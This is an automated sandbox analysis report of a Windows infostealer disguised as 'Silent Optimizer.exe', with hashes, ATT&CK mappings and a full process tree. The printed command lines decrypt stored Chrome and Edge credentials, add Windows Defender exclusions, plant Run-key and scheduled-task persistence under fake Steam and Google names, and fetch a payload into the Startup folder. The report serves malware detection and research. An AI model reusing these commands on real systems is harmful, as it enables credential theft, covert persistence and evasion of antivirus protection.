40c999efbed082c775fcf5c2e63dd221ba9d1559a7649ae3c98ada7184fac5a8

Analysis

max time kernel
110s
max time network
130s
platform
windows11-21h2_x64
resource
win11-20240709-en
resource tags

arch:x64arch:x86image:win11-20240709-enlocale:en-usos:windows11-21h2-x64system
submitted
19/07/2024, 09:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Silent Optimizer.exe
Size

37.6MB
MD5

c7cbc7e63800c94a24fbbf8d30772429
SHA1

f1b0cf8085359450b62902d9e8ef96596b5db4ae
SHA256

aca8fd0fe5ebea04cfd3fa3e4526bea40add68671e1a708637bc393fef4b483b
SHA512

4e32ac11b2f9af9ba866c89b3a686645dc9fb59ab88f6fac4f55846e7a6f01f2cfcbd879f7ab5645f6bd95b98c29c266e771686468f82db911fd9467afcc29b9
SSDEEP

786432:R3on1HvSzxAMNUFZArYsjiWPv0x7OZbEhN:RYn1HvSpNUXmjn4vhN

Score

8^/10

defense_evasion execution persistence spyware stealer

Malware Config

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
11	824	curl.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
5628	powershell.exe
4988	powershell.exe
1036	powershell.exe
4216	powershell.exe
5688	powershell.exe

Loads dropped DLL 1 IoCs

pid	Process
4724	Silent Optimizer.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3637748876-3197268895-3385380113-1000\Software\Microsoft\Windows\CurrentVersion\Run\Powershell = "\"powershell.exe\" -WindowStyle Hidden -ExecutionPolicy Bypass -File \"C:\\Users\\Admin\\AppData\\Local\\Temp\\goTBDPqYUsNCFWn.ps1\""	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3637748876-3197268895-3385380113-1000\Software\Microsoft\Windows\CurrentVersion\Run\Steam = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Silent Optimizer.exe"	reg.exe

Hide Artifacts: Hidden Window 1 TTPs 1 IoCs

Windows that would typically be displayed when an application carries out an operation can be hidden.

defense_evasion

Hidden Window

T1564.003

pid	Process
5132	cmd.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
1	discord.com
4	discord.com
27	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
2	api.ipify.org

An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs

pid	Process
1916	cmd.exe
5356	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Detects videocard installed 1 TTPs 13 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2056	WMIC.exe
752	WMIC.exe
5464	WMIC.exe
5176	WMIC.exe
5360	WMIC.exe
5072	WMIC.exe
2056	WMIC.exe
2376	WMIC.exe
5960	WMIC.exe
3972	WMIC.exe
1372	WMIC.exe
1084	WMIC.exe
5792	WMIC.exe

Enumerates processes with tasklist 1 TTPs 2 IoCs

Process Discovery

T1057

pid	Process
4560	tasklist.exe
4252	tasklist.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry

T1112

pid	Process
2412	reg.exe
1432	reg.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2016	schtasks.exe

Suspicious behavior: EnumeratesProcesses 43 IoCs

pid	Process
1036	powershell.exe
1036	powershell.exe
1980	powershell.exe
1980	powershell.exe
1372	powershell.exe
1372	powershell.exe
5688	powershell.exe
5688	powershell.exe
4988	powershell.exe
4988	powershell.exe
448	powershell.exe
448	powershell.exe
5628	powershell.exe
5628	powershell.exe
4304	powershell.exe
4304	powershell.exe
4560	powershell.exe
4560	powershell.exe
3380	powershell.exe
3380	powershell.exe
4216	powershell.exe
4216	powershell.exe
3196	powershell.exe
3196	powershell.exe
3948	powershell.exe
3948	powershell.exe
3560	powershell.exe
3560	powershell.exe
4724	Silent Optimizer.exe
4724	Silent Optimizer.exe
4724	Silent Optimizer.exe
1436	powershell.exe
1436	powershell.exe
5784	powershell.exe
5784	powershell.exe
2192	powershell.exe
2192	powershell.exe
5244	powershell.exe
5244	powershell.exe
5892	powershell.exe
5892	powershell.exe
5928	powershell.exe
5928	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1036	powershell.exe
Token: SeDebugPrivilege	4560	tasklist.exe
Token: SeDebugPrivilege	4252	tasklist.exe
Token: SeDebugPrivilege	1980	powershell.exe
Token: SeDebugPrivilege	1372	powershell.exe
Token: SeIncreaseQuotaPrivilege	3412	WMIC.exe
Token: SeSecurityPrivilege	3412	WMIC.exe
Token: SeTakeOwnershipPrivilege	3412	WMIC.exe
Token: SeLoadDriverPrivilege	3412	WMIC.exe
Token: SeSystemProfilePrivilege	3412	WMIC.exe
Token: SeSystemtimePrivilege	3412	WMIC.exe
Token: SeProfSingleProcessPrivilege	3412	WMIC.exe
Token: SeIncBasePriorityPrivilege	3412	WMIC.exe
Token: SeCreatePagefilePrivilege	3412	WMIC.exe
Token: SeBackupPrivilege	3412	WMIC.exe
Token: SeRestorePrivilege	3412	WMIC.exe
Token: SeShutdownPrivilege	3412	WMIC.exe
Token: SeDebugPrivilege	3412	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3412	WMIC.exe
Token: SeRemoteShutdownPrivilege	3412	WMIC.exe
Token: SeUndockPrivilege	3412	WMIC.exe
Token: SeManageVolumePrivilege	3412	WMIC.exe
Token: 33	3412	WMIC.exe
Token: 34	3412	WMIC.exe
Token: 35	3412	WMIC.exe
Token: 36	3412	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4188	WMIC.exe
Token: SeSecurityPrivilege	4188	WMIC.exe
Token: SeTakeOwnershipPrivilege	4188	WMIC.exe
Token: SeLoadDriverPrivilege	4188	WMIC.exe
Token: SeSystemProfilePrivilege	4188	WMIC.exe
Token: SeSystemtimePrivilege	4188	WMIC.exe
Token: SeProfSingleProcessPrivilege	4188	WMIC.exe
Token: SeIncBasePriorityPrivilege	4188	WMIC.exe
Token: SeCreatePagefilePrivilege	4188	WMIC.exe
Token: SeBackupPrivilege	4188	WMIC.exe
Token: SeRestorePrivilege	4188	WMIC.exe
Token: SeShutdownPrivilege	4188	WMIC.exe
Token: SeDebugPrivilege	4188	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4188	WMIC.exe
Token: SeRemoteShutdownPrivilege	4188	WMIC.exe
Token: SeUndockPrivilege	4188	WMIC.exe
Token: SeManageVolumePrivilege	4188	WMIC.exe
Token: 33	4188	WMIC.exe
Token: 34	4188	WMIC.exe
Token: 35	4188	WMIC.exe
Token: 36	4188	WMIC.exe
Token: SeDebugPrivilege	5688	powershell.exe
Token: SeIncreaseQuotaPrivilege	3412	WMIC.exe
Token: SeSecurityPrivilege	3412	WMIC.exe
Token: SeTakeOwnershipPrivilege	3412	WMIC.exe
Token: SeLoadDriverPrivilege	3412	WMIC.exe
Token: SeSystemProfilePrivilege	3412	WMIC.exe
Token: SeSystemtimePrivilege	3412	WMIC.exe
Token: SeProfSingleProcessPrivilege	3412	WMIC.exe
Token: SeIncBasePriorityPrivilege	3412	WMIC.exe
Token: SeCreatePagefilePrivilege	3412	WMIC.exe
Token: SeBackupPrivilege	3412	WMIC.exe
Token: SeRestorePrivilege	3412	WMIC.exe
Token: SeShutdownPrivilege	3412	WMIC.exe
Token: SeDebugPrivilege	3412	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3412	WMIC.exe
Token: SeRemoteShutdownPrivilege	3412	WMIC.exe
Token: SeUndockPrivilege	3412	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4724 wrote to memory of 1964	4724	Silent Optimizer.exe	83
PID 4724 wrote to memory of 1964	4724	Silent Optimizer.exe	83
PID 1964 wrote to memory of 1548	1964	cmd.exe	84
PID 1964 wrote to memory of 1548	1964	cmd.exe	84
PID 1964 wrote to memory of 1036	1964	cmd.exe	85
PID 1964 wrote to memory of 1036	1964	cmd.exe	85
PID 1036 wrote to memory of 2604	1036	powershell.exe	86
PID 1036 wrote to memory of 2604	1036	powershell.exe	86
PID 2604 wrote to memory of 5620	2604	csc.exe	87
PID 2604 wrote to memory of 5620	2604	csc.exe	87
PID 4724 wrote to memory of 3488	4724	Silent Optimizer.exe	88
PID 4724 wrote to memory of 3488	4724	Silent Optimizer.exe	88
PID 4724 wrote to memory of 3232	4724	Silent Optimizer.exe	89
PID 4724 wrote to memory of 3232	4724	Silent Optimizer.exe	89
PID 3488 wrote to memory of 1248	3488	cmd.exe	90
PID 3488 wrote to memory of 1248	3488	cmd.exe	90
PID 3232 wrote to memory of 4560	3232	cmd.exe	91
PID 3232 wrote to memory of 4560	3232	cmd.exe	91
PID 4724 wrote to memory of 3380	4724	Silent Optimizer.exe	93
PID 4724 wrote to memory of 3380	4724	Silent Optimizer.exe	93
PID 4724 wrote to memory of 1916	4724	Silent Optimizer.exe	94
PID 4724 wrote to memory of 1916	4724	Silent Optimizer.exe	94
PID 3380 wrote to memory of 4252	3380	cmd.exe	95
PID 3380 wrote to memory of 4252	3380	cmd.exe	95
PID 1916 wrote to memory of 1980	1916	cmd.exe	96
PID 1916 wrote to memory of 1980	1916	cmd.exe	96
PID 4724 wrote to memory of 5356	4724	Silent Optimizer.exe	97
PID 4724 wrote to memory of 5356	4724	Silent Optimizer.exe	97
PID 5356 wrote to memory of 1372	5356	cmd.exe	98
PID 5356 wrote to memory of 1372	5356	cmd.exe	98
PID 4724 wrote to memory of 6000	4724	Silent Optimizer.exe	99
PID 4724 wrote to memory of 6000	4724	Silent Optimizer.exe	99
PID 4724 wrote to memory of 956	4724	Silent Optimizer.exe	100
PID 4724 wrote to memory of 956	4724	Silent Optimizer.exe	100
PID 4724 wrote to memory of 5656	4724	Silent Optimizer.exe	101
PID 4724 wrote to memory of 5656	4724	Silent Optimizer.exe	101
PID 4724 wrote to memory of 5132	4724	Silent Optimizer.exe	102
PID 4724 wrote to memory of 5132	4724	Silent Optimizer.exe	102
PID 5656 wrote to memory of 2016	5656	cmd.exe	103
PID 5656 wrote to memory of 2016	5656	cmd.exe	103
PID 956 wrote to memory of 4488	956	cmd.exe	104
PID 956 wrote to memory of 4488	956	cmd.exe	104
PID 6000 wrote to memory of 3412	6000	cmd.exe	105
PID 6000 wrote to memory of 3412	6000	cmd.exe	105
PID 4724 wrote to memory of 5092	4724	Silent Optimizer.exe	106
PID 4724 wrote to memory of 5092	4724	Silent Optimizer.exe	106
PID 5132 wrote to memory of 5688	5132	cmd.exe	107
PID 5132 wrote to memory of 5688	5132	cmd.exe	107
PID 5092 wrote to memory of 4188	5092	cmd.exe	108
PID 5092 wrote to memory of 4188	5092	cmd.exe	108
PID 4724 wrote to memory of 936	4724	Silent Optimizer.exe	109
PID 4724 wrote to memory of 936	4724	Silent Optimizer.exe	109
PID 936 wrote to memory of 4516	936	cmd.exe	110
PID 936 wrote to memory of 4516	936	cmd.exe	110
PID 4724 wrote to memory of 3656	4724	Silent Optimizer.exe	111
PID 4724 wrote to memory of 3656	4724	Silent Optimizer.exe	111
PID 3656 wrote to memory of 2256	3656	cmd.exe	112
PID 3656 wrote to memory of 2256	3656	cmd.exe	112
PID 4724 wrote to memory of 5416	4724	Silent Optimizer.exe	113
PID 4724 wrote to memory of 5416	4724	Silent Optimizer.exe	113
PID 5416 wrote to memory of 4244	5416	cmd.exe	114
PID 5416 wrote to memory of 4244	5416	cmd.exe	114
PID 5416 wrote to memory of 5376	5416	cmd.exe	115
PID 5416 wrote to memory of 5376	5416	cmd.exe	115

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\Silent Optimizer.exe
"C:\Users\Admin\AppData\Local\Temp\Silent Optimizer.exe"
1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4724
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "type .\temp.ps1 | powershell.exe -noprofile -"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1964
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" type .\temp.ps1 "
    3⤵
    PID:1548
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -noprofile -
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1036
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rtilicx4\rtilicx4.cmdline"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2604
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7232.tmp" "c:\Users\Admin\AppData\Local\Temp\rtilicx4\CSC5A14A872DEB44DE09F2D483B851F99B.TMP"
        5⤵
        
        PID:5620
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3488
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:1248
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3232
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
    PID:4560
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3380
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
    PID:4252
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,226,20,64,244,129,166,55,66,151,150,154,140,253,125,173,74,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,166,104,102,125,164,206,254,77,6,192,167,75,156,46,96,39,177,132,101,171,162,112,41,125,177,116,133,136,204,186,64,94,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,96,101,5,38,213,72,183,110,174,75,123,194,9,72,212,65,201,176,154,198,173,26,240,247,41,85,77,50,30,77,185,32,48,0,0,0,102,157,200,223,235,211,22,57,115,245,85,125,82,218,93,184,38,155,47,156,130,66,43,93,213,240,194,100,234,203,120,206,203,148,92,20,250,249,211,175,173,27,44,198,138,40,22,48,64,0,0,0,169,186,44,68,110,203,81,69,94,211,138,189,17,52,194,35,58,57,146,70,179,247,24,202,251,134,25,200,95,145,122,147,183,39,83,249,106,9,135,101,15,110,244,184,231,17,58,48,40,71,4,87,41,73,168,204,0,43,171,172,132,228,175,31), $null, 'CurrentUser')"
  2⤵
  - An obfuscated cmd.exe command-line is typically used to evade detection.
  - Suspicious use of WriteProcessMemory
  PID:1916
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,226,20,64,244,129,166,55,66,151,150,154,140,253,125,173,74,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,166,104,102,125,164,206,254,77,6,192,167,75,156,46,96,39,177,132,101,171,162,112,41,125,177,116,133,136,204,186,64,94,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,96,101,5,38,213,72,183,110,174,75,123,194,9,72,212,65,201,176,154,198,173,26,240,247,41,85,77,50,30,77,185,32,48,0,0,0,102,157,200,223,235,211,22,57,115,245,85,125,82,218,93,184,38,155,47,156,130,66,43,93,213,240,194,100,234,203,120,206,203,148,92,20,250,249,211,175,173,27,44,198,138,40,22,48,64,0,0,0,169,186,44,68,110,203,81,69,94,211,138,189,17,52,194,35,58,57,146,70,179,247,24,202,251,134,25,200,95,145,122,147,183,39,83,249,106,9,135,101,15,110,244,184,231,17,58,48,40,71,4,87,41,73,168,204,0,43,171,172,132,228,175,31), $null, 'CurrentUser')
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1980
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,226,20,64,244,129,166,55,66,151,150,154,140,253,125,173,74,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,100,144,18,238,231,201,190,190,108,16,233,227,191,87,150,60,137,169,224,238,70,116,235,24,92,247,153,206,55,250,30,178,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,150,238,196,136,219,234,58,155,106,85,251,100,139,180,207,131,31,251,232,54,215,29,26,50,120,45,223,217,251,22,231,82,48,0,0,0,254,51,244,171,42,85,179,44,85,77,6,165,188,22,115,124,150,103,45,100,239,250,150,84,218,102,78,13,182,170,44,76,79,41,73,201,217,204,219,90,92,241,169,157,119,161,62,163,64,0,0,0,178,196,111,120,94,162,77,48,52,93,104,45,118,209,193,92,57,191,224,101,93,18,109,191,157,227,24,108,146,111,35,211,86,245,160,94,1,114,120,32,1,214,75,27,59,3,170,86,178,218,65,84,141,12,10,185,77,117,118,8,139,130,245,106), $null, 'CurrentUser')"
  2⤵
  - An obfuscated cmd.exe command-line is typically used to evade detection.
  - Suspicious use of WriteProcessMemory
  PID:5356
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,226,20,64,244,129,166,55,66,151,150,154,140,253,125,173,74,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,100,144,18,238,231,201,190,190,108,16,233,227,191,87,150,60,137,169,224,238,70,116,235,24,92,247,153,206,55,250,30,178,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,150,238,196,136,219,234,58,155,106,85,251,100,139,180,207,131,31,251,232,54,215,29,26,50,120,45,223,217,251,22,231,82,48,0,0,0,254,51,244,171,42,85,179,44,85,77,6,165,188,22,115,124,150,103,45,100,239,250,150,84,218,102,78,13,182,170,44,76,79,41,73,201,217,204,219,90,92,241,169,157,119,161,62,163,64,0,0,0,178,196,111,120,94,162,77,48,52,93,104,45,118,209,193,92,57,191,224,101,93,18,109,191,157,227,24,108,146,111,35,211,86,245,160,94,1,114,120,32,1,214,75,27,59,3,170,86,178,218,65,84,141,12,10,185,77,117,118,8,139,130,245,106), $null, 'CurrentUser')
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1372
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:6000
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic diskdrive get serialnumber
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3412
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:956
- - C:\Windows\system32\reg.exe
    reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f
    3⤵
    PID:4488
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5656
- - C:\Windows\system32\schtasks.exe
    schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:2016
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1""
  2⤵
  - Hide Artifacts: Hidden Window
  - Suspicious use of WriteProcessMemory
  PID:5132
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Adds Run key to start application
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5688
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\imogunqh\imogunqh.cmdline"
      4⤵
      PID:5756
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7927.tmp" "c:\Users\Admin\AppData\Local\Temp\imogunqh\CSC82BB281C1B4047FBA141ABC01ED052FB.TMP"
        5⤵
        
        PID:5112
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5092
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4188
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:936
- - C:\Windows\system32\cscript.exe
    cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs"
    3⤵
    PID:4516
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat" "
      4⤵
      PID:1316
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4988
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:5628
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\Silent Optimizer.exe" /f
        5⤵
        Adds Run key to start application
        Modifies registry key
        
        PID:2412
    - - C:\Windows\system32\reg.exe
        
        reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam"
        5⤵
        Modifies registry key
        
        PID:1432
    - - C:\Windows\system32\curl.exe
        
        curl -o "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Steam_Service.exe" YOUR-BINDED-EXE-LINK-HERE
        5⤵
        
        PID:4496
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3656
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic baseboard get serialnumber
    3⤵
    PID:2256
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5416
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:4244
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:5376
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"
  2⤵
  PID:3292
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_computersystemproduct get uuid
    3⤵
    PID:2908
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:6060
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:2056
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController GET Description,PNPDeviceID"
  2⤵
  PID:2936
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic PATH Win32_VideoController GET Description,PNPDeviceID
    3⤵
    PID:5576
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:1044
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:448
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic memorychip get serialnumber"
  2⤵
  PID:5368
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic memorychip get serialnumber
    3⤵
    PID:3124
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:5932
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:5956
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"
  2⤵
  PID:1376
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic csproduct get uuid
    3⤵
    PID:4464
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get processorid"
  2⤵
  PID:2464
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get processorid
    3⤵
    PID:3228
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:5992
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:5532
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "getmac /NH"
  2⤵
  PID:3112
- - C:\Windows\system32\getmac.exe
    getmac /NH
    3⤵
    PID:3044
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:1444
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:5988
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:1592
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:3544
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:5464
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:1420
